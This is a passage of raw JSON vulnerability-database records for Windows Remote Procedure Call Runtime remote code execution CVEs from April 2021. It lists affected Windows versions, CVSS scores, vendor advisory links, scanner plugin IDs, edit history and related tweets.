"707ad39bddbe6ba132c89e77b001cb5b"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "9e11ed7fde26d443d1729fc840b7c70e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "3c0406fed37d928b46593ff6555bb7ddedf74ef8815f61d660ae968f13d9a71c", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28330/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-28330"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:17", "rev": 2}, "score": {"value": 3.6, "vector": "NONE", "modified": "2021-04-28T11:49:17", "rev": 2}, "twitter": {"counter": 25, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371813998596", "text": " NEW: CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/fEwWVr44Rb?amp=1"}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/threatintelctr/status/1384220371822419992", "text": " NEW: CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/2ogBljwZsG?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371679809544", "text": " NEW: CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/ZiHFI8SGR7?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371650453516", "text": " NEW: CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Aw1lXDpd8E?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371746914307", "text": " NEW: CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/oeqb8wsiKw?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28358", "bulletinFamily": "NVD", "title": "CVE-2021-28358", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-16T20:26:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28358", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358"], "cvelist": ["CVE-2021-28358"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28358"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-17T09:58:44", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28358"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-17T09:58:44", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383155851733663745", "text": " NEW: CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/uyz8g9BDBa?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383155851733663745", "text": " NEW: CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/uyz8g9BDBa?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358"}], "hash": "c58254fd261052a9040511e3ba00ef2f0e4e5905a84dbc7265b0ec3082f4650b", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "78f4f73c76655409fc00a50ec9581930", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "6b27abee43e5b8391d1b0e3cb139f425", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "afecfb9bd2a5c7c08449f3ebe8c6c828", "key": "extraReferences"}, {"hash": "c594085d7c8b8ed96cbad7bddf96e57c", "key": "modified"}, {"hash": "de448c8859630e2912e4b4e823348cda", "key": "title"}, {"hash": "61714292e358abe3d1a7d407e1c35aa9", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "aa6252d85f18063a0548f29a4eb5aeef", "key": "href"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28358", "id": "CVE-2021-28358", "immutableFields": [], "lastseen": "2021-04-17T09:58:44", "modified": "2021-04-16T20:26:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358"], "reporter": "cve@mitre.org", "title": "CVE-2021-28358", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-17T09:58:44"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28358"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28358"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383155851733663745", "text": " NEW: CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/uyz8g9BDBa?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383155851733663745", "text": " NEW: CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, 